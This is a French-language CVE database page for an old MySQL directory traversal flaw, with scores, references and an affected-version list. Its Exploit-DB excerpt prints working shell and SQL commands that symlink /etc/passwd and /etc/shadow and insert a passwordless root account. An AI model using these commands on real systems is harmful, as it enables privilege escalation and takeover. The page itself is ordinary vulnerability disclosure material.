Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Directory traversal vulnerability in MySQL before 3.23.36 allows local users to modify arbitrary files and gain privileges by creating a database whose name starts with .. (dot dot).
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 20718
Date de publication : 2001-03-17 23h00 +00:00
Auteur : lesha
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/2522/info
MySQL is a relational database management system (RDBMS), freely available and open source. It is maintained by MySQL AB.
A problem with the implementation of some MySQL databases may permit local users to overwrite sensitive system files. This problem affects MySQL implementations that run the database under the uid of root. By using a symbolic link in the /var/tmp directory, and linking it to a file that is write-accesible by root, a user can log into the database with their account, and create a table with a name corresponding to that of the symbolic link. The creation of the table will overwrite the linked file, and any data created within the table will be written to the file that has been symbolically linked. This is dependent entirely upon the attacker having a MySQL account with the "create table" privilege.
Therefore, it is possible for a local user to overwrite sensitive system files, and potentially gain elevated privileges, including administrative access.
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
Products Mentioned
Configuraton 0
Oracle>>Mysql >> Version To (including) 3.23.36
- Oracle>>Mysql >> Version - (Open CPE detail)
- Oracle>>Mysql >> Version 1.5.1 (Open CPE detail)
- Oracle>>Mysql >> Version 3.20 (Open CPE detail)
- Oracle>>Mysql >> Version 3.20.32a (Open CPE detail)
- Oracle>>Mysql >> Version 3.21 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.26 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.27 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.28 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.29 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.30 (Open CPE detail)
- Oracle>>Mysql >> Version 3.22.32 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.0 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.1 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.2 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.3 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.4 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.5 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.6 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.7 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.8 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.9 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.10 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.11 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.12 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.13 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.14 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.15 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.16 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.17 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.18 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.19 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.20 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.21 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.22 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.23 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.24 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.25 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.26 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.27 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.28 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.28 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.29 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.30 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.31 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.32 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.33 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.34 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.35 (Open CPE detail)
- Oracle>>Mysql >> Version 3.23.36 (Open CPE detail)
Références
http://archives.neohapsis.com/archives/bugtraq/2001-03/0237.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://archives.neohapsis.com/archives/bugtraq/2001-03/0396.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
